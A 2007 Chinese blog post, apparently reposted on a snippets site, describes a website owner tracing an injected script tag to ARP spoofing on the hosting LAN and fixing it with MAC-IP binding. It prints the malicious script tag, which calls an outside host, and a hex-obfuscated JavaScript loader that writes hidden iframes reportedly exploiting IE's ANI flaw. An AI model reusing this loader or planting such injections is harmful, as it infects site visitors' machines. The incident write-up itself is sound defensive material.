网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
jquery photoFrame 图片边框美化显示插件
Jun 28 Javascript
基于jQuery的实现简单的分页控件
Oct 10 Javascript
javascript的字符串按引用复制和传递,按值来比较介绍与应用
Dec 28 Javascript
JQuery的Ajax中Post方法传递中文出现乱码的解决方法
Oct 21 Javascript
jQuery实现花式轮播之圣诞节礼物传送效果
Dec 25 Javascript
jQuery按需加载轮播图(web前端性能优化)
Feb 17 Javascript
SpringBoot+Vue前后端分离,使用SpringSecurity完美处理权限问题的解决方法
Jan 09 Javascript
vuejs 制作背景淡入淡出切换动画的实例
Sep 01 Javascript
node.js实现上传文件功能
Jul 15 Javascript
JS实现购物车基本功能
Nov 08 Javascript
基于jQuery拖拽事件的封装
Nov 29 jQuery
Vue CLI中模式与环境变量的深入详解
May 30 Vue.js
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
PHP技术开发技巧分享
2010/03/23 PHP
yii中widget的用法
2014/12/03 PHP
php获取图片信息的方法详解
2015/12/10 PHP
Zend Framework分发器用法示例
2016/12/11 PHP
yii2-GridView在开发中常用的功能及技巧总结
2017/01/07 PHP
PHP实现的分解质因数操作示例
2018/08/01 PHP
jquery插件之easing 动态菜单
2010/08/21 Javascript
wap浏览自动跳转到wap页面的js代码
2014/05/17 Javascript
jQuery的context属性用法实例
2014/12/27 Javascript
jQuery实现给页面换肤的方法
2015/05/30 Javascript
js带缩略图的图片轮播效果代码分享
2015/09/14 Javascript
AngularJs解决跨域问题案例详解(简单方法)
2016/05/19 Javascript
使用Node.js给图片加水印的方法
2016/11/15 Javascript
JS中事件冒泡和事件捕获介绍
2016/12/13 Javascript
vue+element-ui集成随机验证码+用户名+密码的form表单验证功能
2018/08/05 Javascript
JavaScript面向对象继承原理与实现方法分析
2018/08/09 Javascript
Vue源码分析之Vue实例初始化详解
2019/08/25 Javascript
Angular如何由模板生成DOM树的方法
2019/12/23 Javascript
在Python的Django框架中更新数据库数据的方法
2015/07/17 Python
简介Python设计模式中的代理模式与模板方法模式编程
2016/02/02 Python
python文本数据相似度的度量
2018/03/12 Python
python使用turtle库绘制树
2018/06/25 Python
Pycharm设置去除显示的波浪线方法
2018/10/28 Python
Mac在python3环境下安装virtualwrapper遇到的问题及解决方法
2019/07/09 Python
使用Keras中的ImageDataGenerator进行批次读图方式
2020/06/17 Python
python爬虫构建代理ip池抓取数据库的示例代码
2020/09/22 Python
Manuka Doctor英国官网:真正的麦卢卡蜂蜜和护肤品
2018/10/26 全球购物
美国葡萄酒网上商店:Martha Stewart Wine Co.
2019/03/17 全球购物
职务说明书范文
2014/05/07 职场文书
淘宝店策划方案
2014/06/07 职场文书
大学考试作弊检讨书
2015/05/06 职场文书
2015年保险业务员工作总结
2015/05/27 职场文书
2019年励志签名:致拼搏路上的自己
2019/10/11 职场文书
基于Python编写简易版的天天跑酷游戏的示例代码
2022/03/23 Python
【DOTA2】高能暴走TK秀!PSG LGD vs ASTER - DPC 2022 WINTER TOUR CN
2022/04/02 DOTA
Vue深入理解插槽slot的使用
2022/08/05 Vue.js